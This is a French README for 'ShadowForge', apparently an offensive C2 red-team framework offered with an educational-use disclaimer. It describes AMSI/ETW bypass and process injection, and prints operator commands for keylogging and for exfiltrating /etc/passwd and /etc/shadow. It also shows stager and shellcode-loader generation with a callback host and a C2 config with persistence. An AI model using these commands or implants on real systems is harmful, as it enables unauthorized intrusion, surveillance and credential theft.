ShadowForge

"Trust no one. Suspect everyone..."

ShadowForge est un framework C2 (Command & Control) red team avancé. Un toolkit complet pour la post-exploitation, la défense evasion, et les opérations offensives en sécurité.

⚠️ Avertissement✨ Fonctionnalités📦 Installation🚀 Utilisation📦 Modules🤝 Contribuer

---

⚠️ Avertissement - Important

AVERTISSEMENT LÉGAL

ShadowForge est un outil à usage éducatif uniquement.

• ✅ Utilisez-le sur votre propre infrastructure
• ✅ Utilisez-le dans un environnement de laboratoire isolé
• ✅ Avec autorisation explicite du propriétaire du système
• ❌ Toute utilisation malveillante ou non autorisée est interdite

L'auteur ne peut être tenu responsable de toute utilisation abusive. Respectez les lois de votre juridiction.

---

✨ Fonctionnalités

Feature	Description
🖥️ C2 Server	Serveur C2 async avec gestion d'agents
🤖 Agent Cross-Platform	Support Windows, Linux, macOS
🛡️ Defense Evasion	AMSI/ETW bypass, syscalls directs
💉 Process Injection	Classic, APC, process hollowing
🔒 Encryption	AES-256-GCM, XOR, certificate pinning
📡 C2 Protocols	HTTP, HTTPS, DNS tunneling
🐍 Payload Generator	Python droppers, PS1 stagers, shellcode loaders
📦 Post-Exploitation	Screenshot, keylogger, port scanner, exfiltration

Techniques d'Evasion

✓ AMSI Bypass (patch + unhook)
✓ ETW Bypass (NtTraceEvent patching)
✓ Direct Syscalls (bypass API hooks)
✓ RWX Memory Obfuscation
✓ Parent PID Spoofing
✓ Userland Hooks Bypass
✓ Network Tunneling (HTTP/DNS)
✓ Sleep Obfuscation + Jitter

---

📦 Installation

# Cloner le repo
git clone https://github.com/s1d9e/shadowforge.git
cd shadowforge

# Installer les dépendances
pip install -r requirements.txt

# Ou utiliser le script d'installation
chmod +x install.sh
./install.sh

# Lancer le serveur C2
python server/c2_server.py

Dépendances

pycryptodome>=3.18.0    # AES encryption
paramiko>=3.0.0         # SSH functionality
pyautogui>=0.9.54       # Cross-platform screenshots
pillow>=10.0.0          # Image processing
pywin32>=306            # Windows API (Windows only)

---

🚀 Utilisation

Serveur C2

# Mode basique
python server/c2_server.py

# Avec options
python server/c2_server.py --host 0.0.0.0 --port 8443 --db shadowforge.db

Shell Interactif

shadowforge> help
shadowforge> list                    # Liste des agents connectés
shadowforge> interact <session>     # Interagir avec un agent
shadowforge> exec whoami             # Exécuter commande
shadowforge> screenshot             # Capturer l'écran
shadowforge> keylogger 60           # Keylogger (60 sec)
shadowforge> portscan 192.168.1.1   # Scanner ports
shadowforge> exfiltrate /etc/passwd # Voler un fichier
shadowforge> kill                   # Tuer l'agent
shadowforge> exit                   # Quitter

Génération de Payloads

# Python dropper
python exploits/payload_gen.py --mode dropper \
  --input agent/agent.py \
  --output output/implant.py

# PowerShell stager (Meterpreter-compatible)
python exploits/payload_gen.py --mode stager \
  --lhost 10.0.0.1 \
  --lport 8443 \
  --format ps1

# Shellcode loader
python exploits/payload_gen.py --mode loader \
  --shellcode shellcode.bin \
  --output output/loader.exe

Mode CLI

# Générer un payload
python shadowforge.py gen --mode stager --lhost 10.0.0.1 --lport 8443

# Démarrer un listener
python shadowforge.py listen --port 4444

# Utilitaires
python shadowforge.py utils hash "password"
python shadowforge.py utils b64 "secret" --encode

---

📦 Modules

Modules Agent

Module	Description	Usage
screenshot	Capture du bureau	screenshot
keylogger	Enregistrement des frappes	keylogger 60
portscanner	Scan TCP avec détection de services	portscan 192.168.1.1
shell	Exécution de commandes	shell whoami
exfiltrate	Téléchargement de fichiers	exfiltrate /etc/shadow
process	Contrôle de processus	process list/kill/inject

Module Evasion

from agent.evasion import AMSIBypass, ProcessInjection, SyscallWrapper

# Patch AMSI
AMSI.patch_amsi_init()

# Injection classique
ProcessInjection.classic_injection(pid, shellcode)

# Syscalls directs
syscall = SyscallWrapper()
addr = syscall.nt_allocate_virtual_memory(pid, size)

---

🏗️ Architecture

┌─────────────────────────────────────────────────────────────────┐
│                      SHADOWFORGE FRAMEWORK                       │
├─────────────────────────────────────────────────────────────────┤
│                                                                  │
│  ┌──────────────┐         ┌──────────────────┐                  │
│  │   OPERATOR   │◄──────►│    C2 SERVER     │                  │
│  │   (YOU)      │  tasks │  (c2_server.py) │                  │
│  └──────────────┘ result └────────┬─────────┘                  │
│                                    │                            │
│         ┌───────────────────────────┼───────────────────────────┐│
│         │                           │                           ││
│  ┌──────▼──────┐           ┌───────▼───────┐          ┌───────▼───────┐
│  │  HTTP/HTTPS │           │    LISTENER   │          │     SMB       │
│  │   BEACON    │           │   MANAGER     │          │   HANDLER     │
│  └─────────────┘           └───────────────┘          └───────────────┘
│                                                                      │
│  ┌──────────────────────────────────────────────────────────────────┐
│  │                      AGENT IMPLANT                                │
│  │                                                                  │
│  │  ┌─────────┐  ┌───────────┐  ┌────────────┐  ┌──────────────┐   │
│  │  │Screenshot│  │ Keylogger │  │ PortScanner│  │  Exfiltrate  │   │
│  │  └─────────┘  └───────────┘  └────────────┘  └──────────────┘   │
│  │  ┌─────────┐  ┌───────────┐  ┌────────────┐  ┌──────────────┐   │
│  │  │  Shell  │  │  Process  │  │ Persistence│  │   Evasion    │   │
│  │  └─────────┘  └───────────┘  └────────────┘  └──────────────┘   │
│  └──────────────────────────────────────────────────────────────────┘
│                          │ TARGET MACHINE
└─────────────────────────────────────────────────────────────────┘

---

📝 Configuration

Agent (config/settings.py)

AGENT_CONFIG = {
    "c2_server": "https://c2.shadowforge.io",
    "c2_port": 8443,
    "poll_interval": 5,
    "jitter_range": [0, 30],
    "kill_date": None,
    "persistence_method": "registry",
    "encryption_enabled": True,
}

Server

C2_CONFIG = {
    "bind_host": "0.0.0.0",
    "bind_port": 8443,
    "database": "shadowforge.db",
    "max_agents": 1000,
    "task_timeout": 300,
}

---

🏗️ Structure

shadowforge/
├── agent/
│   ├── agent.py           # Implant principal (~710 lignes)
│   ├── evasion.py         # Techniques d'evasion (~460 lignes)
│   └── utils.py           # Utilitaires (~280 lignes)
├── server/
│   ├── c2_server.py       # Serveur C2 (~650 lignes)
│   └── listener.py        # Gestionnaire de listeners (~300 lignes)
├── exploits/
│   ├── payload_gen.py     # Générateur de payloads (~310 lignes)
│   └── exploits.py         # Outils d'exploitation (~390 lignes)
├── config/
│   └── settings.py         # Configuration
├── docs/
│   ├── techniques.md       # Documentation techniques
│   └── QUICKSTART.md      # Guide rapide
├── shadowforge.py         # CLI unifiée (~160 lignes)
├── setup.py               # Setuptools
├── requirements.txt       # Dépendances
├── README.md
├── LICENSE
├── CHANGELOG.md
├── CONTRIBUTING.md
└── SECURITY.md

---

🤝 Contribuer

Les contributions sont les bienvenues !

1. Fork le projet
2. Créez une branche (git checkout -b feature/AmazingFeature)
3. Commit (git commit -m 'Add AmazingFeature')
4. Push (git push origin feature/AmazingFeature)
5. Ouvrez une Pull Request

---

📜 Licence

MIT License - Voir LICENSE

---

🙏 Remerciements

• Framework inspiré des techniques C2 modernes
• Développé pour la communauté cybersécurité française 🇫🇷
• Outil de recherche en sécurité offensive

---

_{Made with 🛡️ by s1d9e | ShadowForge C2 Framework - For Educational Purposes Only}